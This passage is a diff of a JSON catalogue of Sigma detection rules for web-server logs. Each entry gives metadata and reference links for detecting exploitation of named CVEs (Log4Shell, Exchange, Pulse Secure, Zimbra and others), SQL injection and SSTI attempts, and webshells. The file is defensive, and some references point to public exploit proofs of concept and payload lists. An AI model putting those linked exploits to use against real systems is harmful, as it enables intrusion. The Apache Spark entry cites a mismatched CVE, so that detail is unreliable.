+ ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/06/29", + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh", + "meta": { + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ], + "creation_date": "2021/05/22", + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "uuid": 
"effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log", + "meta": { + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags", + "creation_date": "2021/08/10", + "filename": "web_cve_2021_26858_iis_rce.yml", + "author": "frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "webserver", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480", + "meta": { + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/05/14", + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation", + "meta": { + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/30", + "filename": 
"web_cve_2021_33766_msexchange_proxytoken.yml", + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags", + "creation_date": "2021/09/20", + "filename": "web_cve_2021_40539_adselfservice.yml", + "author": "Tobias Michalski, Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit", + "meta": { + "refs": [ + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/09/10", + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "level": "critical", + "falsepositive": [ + 
"Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt", + "meta": { + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/10/05", + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "author": "daffainfo, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237", + "meta": { + "refs": [ + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", + 
"https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/11/17", + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a successful Grafana path traversal exploitation", + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798", + "meta": { + "refs": [ + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/08", + "filename": "web_cve_2021_43798_grafana.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", + "value": "Log4j RCE CVE-2021-44228 Generic", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + 
"https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/10", + "filename": "web_cve_2021_44228_log4j.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Vulnerability scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/12/10", + "filename": "web_cve_2021_44228_log4j_fields.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Vulnerability scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + 
"https://www.yang99.top/index.php/archives/82/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ], + "creation_date": "2022/08/17", + "filename": "web_cve_2022_27925_exploit.yml", + "author": "@gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", + "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", + "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass", + "meta": { + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/08/12", + "filename": "web_cve_2022_31656_auth_bypass.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE", + "meta": { + "refs": [ + 
"https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/08/12", + "filename": "web_cve_2022_31659_vmware_rce.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs", + "meta": { + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ], + "creation_date": "2022/07/19", + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API", + "meta": { + "refs": [ + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + 
"https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ], + "creation_date": "2022/09/29", + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/03/03", + "filename": "web_exchange_exploitation_hafnium.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. 
owa, ecp) but are not Microsoft Exchange related" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/07", + "filename": "web_exchange_proxyshell.yml", + "author": "Florian Roth, Rich Warren", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ], + "creation_date": "2021/08/09", + "filename": "web_exchange_proxyshell_successful.yml", + "author": "Florian Roth, Rich Warren", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + 
"description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", + "value": "Successful IIS Shortname Fuzzing Scan", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", + "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/10/06", + "filename": "web_iis_tilt_shortname_scan.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible Java payloads in web access logs", + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ], + "creation_date": "2022/06/04", + "filename": "web_java_payload_in_access_logs.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate apps" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", 
+ "value": "JNDIExploit Pattern", + "meta": { + "refs": [ + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/12", + "filename": "web_jndi_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/02/19", + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump", + "meta": { + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2021/05/31", + "filename": "web_nginx_core_dump.yml", + "author": "Florian Roth", + "level": "high", + 
"falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Detects path traversal exploitation attempts", + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/09/25", + "filename": "web_path_traversal_exploitation_attempt.yml", + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "level": "medium", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access", + "meta": { + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2020/12/17", + "filename": "web_solarwinds_supernova_webshell.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit", + "meta": { + 
"refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ], + "creation_date": "2021/01/25", + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword", + "meta": { + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2019/06/08", + "filename": "web_source_code_enumeration.yml", + "author": "James Ahearn", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL Injection Strings", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/payloadbox/sql-injection-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" 
+ ], + "tags": "No established tags", + "creation_date": "2020/02/22", + "filename": "web_sql_injection_in_access_logs.yml", + "author": "Saw Win Naung, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects SSTI attempts sent via GET requests in access logs", + "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", + "value": "Server Side Template Injection Strings", + "meta": { + "refs": [ + "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" + ], + "tags": "No established tags", + "creation_date": "2022/06/14", + "filename": "web_ssti_in_access_logs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools", + "meta": { + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + 
"https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2022/07/19", + "filename": "web_susp_useragents.yml", + "author": "Nasreddine Bencherchali, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", + "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", + "value": "Suspicious Windows Strings In URI", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" + ], + "tags": [ + "attack.persistence", + "attack.exfiltration", + "attack.t1505.003" + ], + "creation_date": "2022/06/06", + "filename": "web_susp_windows_path_uri.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate application and websites that use windows paths in their URL" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell Access", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.t1505.003" + ], + "creation_date": "2021/02/22", + "filename": "web_unc2546_dewmode_php_webshell.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs", + "meta": { + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2020/08/04", + "filename": "web_webshell_regeorg.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings", + "meta": { + "refs": [ + 